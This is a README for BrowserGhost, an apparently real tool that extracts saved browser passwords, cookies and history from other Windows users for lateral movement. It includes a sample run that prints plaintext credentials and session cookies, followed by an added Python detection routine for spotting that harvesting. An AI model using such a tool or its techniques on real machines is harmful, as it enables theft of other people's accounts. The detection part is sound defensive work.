
# BrowserGhost
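## Introduction:
This is a tool for extracting browser passwords; more features will be added later.
## Features completed so far:
- Runs as SYSTEM to extract the browser passwords of other users on the machine (convenient for quick credential collection during lateral movement)
- Implemented on .NET 2, so it is compatible with most Windows versions and has no extra dependencies (no need for baggage such as System.Data.SQLite.dll)
- Can decrypt Chrome passwords for all versions (the encryption scheme changed after Chrome 80)
- Chrome: login data, cookies, history and bookmarks can now be retrieved
- IE: bookmarks, passwords and history are now supported (extracting passwords with .NET 2 is too complicated, so the code is adapted from `https://github.com/djhohnstein/SharpWeb/raw/master/Edge/SharpEdge.cs`)
## To do:
- Retrieving IE History under SYSTEM privileges has some problems
- Improve the output
- Monitor cookies in real time
- Support other mainstream browsers (Firefox, 360 Extreme Browser, etc.)
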
```
C:\Users\Administrator\Desktop>BrowserGhost.exe
[+] Current user Administrator
[*] [4764] [explorer] [Administrator]
[*] Impersonate user Administrator
[*] Current user Administrator
===============Chrome=============
[*]Get Chrome Login Data
[+] Copy C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Login Data to C:\Users\Administrator\AppData\Local\Temp\tmp6B9F.tmp
[URL] -> https://xui.ptlogin2.qq.com/cgi-bin/xlogin
[USERNAME] -> n0thing@gmail.com
[PASSWORD] -> Iloveprettygirls
[+] Delete File C:\Users\Administrator\AppData\Local\Temp\tmp6B9F.tmp
[*]Get Chrome Bookmarks
{
"checksum": "eee70b132cc4f9644d01f989e18fdb38",
"roots": {
"bookmark_bar": {
"children": [ {
"date_added": "13236861887917624",
"guid": "c5df2041-d745-4173-af39-b5c48f8d98a2",
"id": "5",
"name": "GitHub",
"type": "url",
"url": "https://github.com/"
} ],
"date_added": "13236861618031351",
"date_modified": "13236861887917624",
"guid": "00000000-0000-4000-a000-000000000002",
"id": "1",
"name": "书签栏",
"type": "folder"
},
"other": {
"children": [ ],
"date_added": "13236861618031378",
"date_modified": "0",
"guid": "00000000-0000-4000-a000-000000000003",
"id": "2",
"name": "其他书签",
"type": "folder"
},
"synced": {
"children": [ ],
"date_added": "13236861618031381",
"date_modified": "0",
"guid": "00000000-0000-4000-a000-000000000004",
"id": "3",
"name": "移动设备书签",
"type": "folder"
}
},
"version": 1
}
[*]Get Chrome Cookie
[+] Copy C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Cookies to C:\Users\Administrator\AppData\Local\Temp\tmp6D94.tmp
[github.com] _device_id=516175fxxxxxxxxx90133c2
[.github.com] _octo=GH1.1.3xxxxxxxxx5173
[.google.com] NID=204=DEIRBPT8FML_IsHGv1B2xxxxxxxxxxxxxxxxxxxSRlaNRV3-nfhFV8aHAgO6Smtf4JXQqR-W63p0KOVKgVd0VCXv4bKww97DEhc-PI1sVdbD4hGOuVwchN4Bwo-V61AtfjZM
[+] Delete File C:\Users\Administrator\AppData\Local\Temp\tmp6D94.tmp
[*]Get Chrome History
[+] Copy C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\History to C:\Users\Administrator\AppData\Local\Temp\tmp6E32.tmp
http://github.com/ The worlds leading software development platform · GitHub
https://github.com/ GitHub
https://github.com/login Sign in to GitHub · GitHub
[+] Delete File C:\Users\Administrator\AppData\Local\Temp\tmp6E32.tmp
===============IE=============
[*]Get IE Books
C:\Users\Administrator\Favorites\Sign in to GitHub · GitHub.url
URL=https://github.com/session
[*]Get IE Password
Vault Type : Web Credentials
Resource : https://github.com/
Identity : n0thing@gmail.com
Credential : Iloveprettygirls
LastModified : 2020/6/17 7:08:50
[*]Get IE History
https://github.com/login
https://github.com/join
https://github.com/john
https://github.com/sign
http://github.com/
http://go.microsoft.com/fwlink/p/?LinkId=255141
[*] Recvtoself
[*] Current user Administrator
```
![](2.png)
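
From the defender's side, the run above leaves a recognisable file-access pattern: a process that is not the browser reads `Login Data`, `Cookies` and `History` from the Chrome profile and stages each as a short-lived `tmpXXXX.tmp` copy. The detection logic below is an added example, not part of BrowserGhost; the event schema (`pid`, `image`, `op`, `path`), the allow-list, the pids and the sample events are constructed assumptions, with the file paths taken from the output above.

```python
import re
from collections import defaultdict
from ntpath import basename  # parses Windows paths on any OS

# Chrome profile stores that the sample run above copies out.
STORE_RE = re.compile(
    r"\\Google\\Chrome\\User Data\\[^\\]+\\(Login Data|Cookies|History|Bookmarks)$", re.I)
# Staging-file pattern seen in the sample run (tmp6B9F.tmp and similar).
TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\tmp[0-9A-F]{1,4}\.tmp$", re.I)
# Assumption: processes allowed to open the stores; extend for your environment.
ALLOWED_IMAGES = {"chrome.exe"}

def find_store_harvesting(events):
    """Report non-browser processes that read Chrome stores and stage temp copies."""
    seen = defaultdict(lambda: {"stores": set(), "create": set(), "delete": set()})
    for ev in events:
        image = basename(ev["image"]).lower()
        if image in ALLOWED_IMAGES:
            continue
        rec = seen[(ev["pid"], image)]
        store = STORE_RE.search(ev["path"])
        if ev["op"] == "read" and store:
            rec["stores"].add(store.group(1).lower())
        elif ev["op"] in ("create", "delete") and TEMP_RE.search(ev["path"]):
            rec[ev["op"]].add(ev["path"].lower())
    report = {}
    for key, rec in seen.items():
        if rec["stores"]:  # temp-file churn alone is normal and is not reported
            # staged_copies: temp files created and then removed by the same process
            report[key] = {"stores": sorted(rec["stores"]),
                           "staged_copies": len(rec["create"] & rec["delete"])}
    return report

# Constructed sample events (hypothetical schema: pid, image, op, path).
PROFILE = r"C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default"
TEMP = r"C:\Users\Administrator\AppData\Local\Temp"
TOOL = r"C:\Users\Administrator\Desktop\BrowserGhost.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
SAMPLE_EVENTS = [
    {"pid": 4321, "image": CHROME, "op": "read", "path": PROFILE + r"\Login Data"},
    {"pid": 7001, "image": r"C:\Windows\setup.exe", "op": "create", "path": TEMP + r"\tmp1A2B.tmp"},
    {"pid": 6112, "image": TOOL, "op": "read", "path": PROFILE + r"\Login Data"},
    {"pid": 6112, "image": TOOL, "op": "create", "path": TEMP + r"\tmp6B9F.tmp"},
    {"pid": 6112, "image": TOOL, "op": "delete", "path": TEMP + r"\tmp6B9F.tmp"},
    {"pid": 6112, "image": TOOL, "op": "read", "path": PROFILE + r"\Cookies"},
    {"pid": 6112, "image": TOOL, "op": "create", "path": TEMP + r"\tmp6D94.tmp"},
    {"pid": 6112, "image": TOOL, "op": "delete", "path": TEMP + r"\tmp6D94.tmp"},
]
```

The check keys on behaviour rather than the binary name, so a renamed copy of the tool is reported the same way.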